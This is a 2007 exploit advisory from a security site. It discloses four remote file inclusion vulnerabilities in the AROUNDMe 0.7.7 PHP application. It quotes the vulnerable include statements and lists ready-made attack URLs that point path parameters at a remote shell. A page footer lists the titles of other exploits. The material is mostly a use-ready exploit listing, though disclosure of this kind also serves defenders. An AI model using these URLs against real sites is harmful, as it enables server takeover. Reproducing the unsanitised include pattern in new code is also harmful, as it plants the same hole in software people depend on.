exploits , vulnerabilities , articles , AROUNDMe 0.7.7 Multiple Remote File Inclusion Vulnerabilities

2007-04-04

AROUNDMe 0.7.7 Multiple Remote File Inclusion Vulnerabilities

Rated as : Moderate Risk

AROUNDMe  _0_7_7
*****************
Found by kezzap66345 *
*****************
*****************
Script
Download:http://download.savannah.gnu.org/releases/aroundme/aroundme_0_7_7.tar.gz

*****************
*****************
ERROR#1:
File:\components\core\inc\core_profile.header.php
*****************


include_once($language_path_core . 'inc/me_common.inc.php');    
<<< rfi coded


**************************************************************************************
RFI#1:

http://SITE.com/path/aroundme/components/core/inc/core_profile.header.php?language_path_core=[SHELL]


**************************************************************************************

*****************
ERROR#2:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
*****************

<?php
                       include $template_path_core .
"inc/comment.inc.php";
                       ?> <<< rfi coded


**************************************************************************************
RFI#2:
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]




ERROR#3:
File:/components/core/template/barnraiser_01/default.tpl.php
*****************


include_once($template_path . "inc/menu_" . $section .
".inc.php");    <<< rfi coded


**************************************************************************************
RFI#3:

http://SITE.com/path/components/core/template/barnraiser_01/default.tpl.php?template_path=[SHELL]


**************************************************************************************

*****************
ERROR#4:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
*****************
include($template_path_core .
"inc/form_gui_html_editor.inc.php");    <<<
rfi coded


**************************************************************************************
RFI#4:

http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]
Thanks:Siircicocuk and x0r0n
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
******Thanx****SiiRCiCOCUK****str0ke**************************************************
securitydot.net - 2007-04-04

Exploits - newest 10 RSS | More

2007-06-15 57338 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34254 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42484 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29369 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19797 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16734 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19440 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16623 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33643 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17257 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit